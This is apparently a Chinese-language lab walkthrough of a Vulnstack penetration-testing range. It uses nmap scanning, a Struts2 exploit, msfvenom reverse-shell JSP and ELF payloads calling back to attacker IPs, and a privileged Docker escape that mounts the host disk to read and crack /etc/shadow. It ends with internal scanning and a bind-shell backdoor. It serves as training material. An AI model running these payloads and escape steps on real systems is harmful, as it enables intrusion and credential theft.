## 文章

http://vulnstack.qiyuanxuetang.net/vuln/detail/6/

[环境搭建](https://www.bilibili.com/video/BV16e4y1h7m2/?spm_id_from=333.999.0.0&vd_source=c1315f6e47145c74f7c3b5f579a7e70d)

## 打靶过程

先用nmap进行端口扫描

```bash
nmap -p- --min-rate 10000 -Pn 192.168.157.128
```

发现开启了22、2001、2002、2003端口

![image-20230926225204107](C:\Users\绮洛\AppData\Roaming\Typora\typora-user-images\image-20230926225204107.png)

再重点对这些端口进行扫描

```bash
nmap -p 22,2001,2003,2002 -sV -sC -Pn 192.168.157.128
```

![image-20230926225539564](C:\Users\绮洛\AppData\Roaming\Typora\typora-user-images\image-20230926225539564.png)

先访问2001端口看看，nmap扫到`http-title` 为Struts2，猜测为Structs2漏洞

用扫描工具检测一下，发现S2-046漏洞

![image-20230927092102242](C:\Users\绮洛\AppData\Roaming\Typora\typora-user-images\image-20230927092102242.png)

尝试使用msf生成jsp马进行上传,达到上线的目的

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 -f jsp -o Ki1ro.jsp
```

![image-20230927092611964](C:\Users\绮洛\AppData\Roaming\Typora\typora-user-images\image-20230927092611964.png)

msf启动监听

![image-20230927092733951](C:\Users\绮洛\AppData\Roaming\Typora\typora-user-images\image-20230927092733951.png)

访问Ki1ro.jsp,成功上线

![image-20230927092843260](C:\Users\绮洛\AppData\Roaming\Typora\typora-user-images\image-20230927092843260.png)

打开shell，shell不是很完整，用python反弹一个完整的shell

```bash
python -c 'import pty;pty.spawn("/bin/bash")'
```

![image-20230927095754622](C:\Users\绮洛\AppData\Roaming\Typora\typora-user-images\image-20230927095754622.png)

使用以下命令检测发现是Docker环境

```bash
cat /proc/1/cgroup | grep -qi docker && echo "Is Docker" || echo "Not Docker"
```

![image-20230927101416229](C:\Users\绮洛\AppData\Roaming\Typora\typora-user-images\image-20230927101416229.png)

上传 [container-escape-check](https://github.com/teamssix/container-escape-check) 来检测Docker逃逸漏洞

发现存在以下三种逃逸漏洞

![image-20230927101544404](C:\Users\绮洛\AppData\Roaming\Typora\typora-user-images\image-20230927101544404.png)

我这里选择 [CVE-2021-22555](https://github.com/xyjl-ly/CVE-2021-22555-Exploit)来进行容器逃逸

没有成功

![image-20230927102459151](C:\Users\绮洛\AppData\Roaming\Typora\typora-user-images\image-20230927102459151.png)

换 [CVE-2016-5195](https://github.com/gbonacini/CVE-2016-5195)

还是不行

![image-20230927104243350](C:\Users\绮洛\AppData\Roaming\Typora\typora-user-images\image-20230927104243350.png)

再尝试 [CVE-2017-1000112](https://github.com/Metarget/metarget/blob/master/writeups_cnv/kernel-cve-2017-1000112/poc.c) 也不太行

可能需要考虑攻击其他Docker服务，我这里偷个懒，在Ubuntu机器下看看哪个Docker容器开了提权

发现tomcat下开了提权，那就来打这个容器

![image-20230927110214099](C:\Users\绮洛\AppData\Roaming\Typora\typora-user-images\image-20230927110214099.png)

看这篇 [一文了解Tomcat/8.5.19文件上传漏洞复现](https://blog.csdn.net/allintao/article/details/129503762) 发现该版本有文件上传漏洞

上传msf jsp马

![image-20230927111436822](C:\Users\绮洛\AppData\Roaming\Typora\typora-user-images\image-20230927111436822.png)

访问Ki1ro.jsp后成功上线

![image-20230927111625708](C:\Users\绮洛\AppData\Roaming\Typora\typora-user-images\image-20230927111625708.png)

开始尝试Privileged 特权模式容器逃逸

查看挂载磁盘设备

```bash
fdisk -l
```

![image-20230927112248921](C:\Users\绮洛\AppData\Roaming\Typora\typora-user-images\image-20230927112248921.png)

在容器内部执行以下命令，将宿主机文件挂载到 /test 目录下

```
mkdir /test && mount /dev/sda1 /test
```

尝试访问宿主机 shadow 文件，可以看到正常访问

```bash
cat /test/etc/shadow
```

![image-20230927112057125](C:\Users\绮洛\AppData\Roaming\Typora\typora-user-images\image-20230927112057125.png)

我这里直接用john爆破shadow

获取ubuntu密码 ubuntu:ubuntu

![image-20230927112413091](C:\Users\绮洛\AppData\Roaming\Typora\typora-user-images\image-20230927112413091.png)

xshell直接连

![image-20230927112732237](C:\Users\绮洛\AppData\Roaming\Typora\typora-user-images\image-20230927112732237.png)

用msf生成一个elf木马

```bash
sfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.157.129 LPORT=4444 -f elf -o Ki1ro
```

用xftp上传上去，执行命令

![image-20230927113228459](C:\Users\绮洛\AppData\Roaming\Typora\typora-user-images\image-20230927113228459.png)

成功上线

![image-20230927113312003](C:\Users\绮洛\AppData\Roaming\Typora\typora-user-images\image-20230927113312003.png)

使用 `auxiliary/scanner/discovery/udp_probe` 进行内网扫描

```bash
use auxiliary/scanner/discovery/udp_probe
set rhosts 192.168.183.0/24
set threads 5
run 
```

发现两台其他主机 192.168.183.130、 192.168.183.131

![image-20230927185344159](C:\Users\绮洛\AppData\Roaming\Typora\typora-user-images\image-20230927185344159.png)

上传`fscan`进行扫描，发现130为域控主机，130和131都存在ms17-010漏洞

![image-20230927194155976](C:\Users\绮洛\AppData\Roaming\Typora\typora-user-images\image-20230927194155976.png)

但是我怎么也利用不成功，可能环境还是有点问题，只能发动"超能力"，在131上挂一个正向连接木马

```bash
msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=192.168.157.129 LPORT=4444 -f exe -o 123.exe
```

直接通过虚拟机把木马拖进去，msf开启监听，运行木马，成功上线

![image-20230928150112362](C:\Users\绮洛\AppData\Roaming\Typora\typora-user-images\image-20230928150112362.png)

后面因为ms17-010无法成功利用131主机，所以就不复现了，之后就是使用ms14-069进行提权，登录域控，关闭其防火墙，再使用ms17-010获取system权限
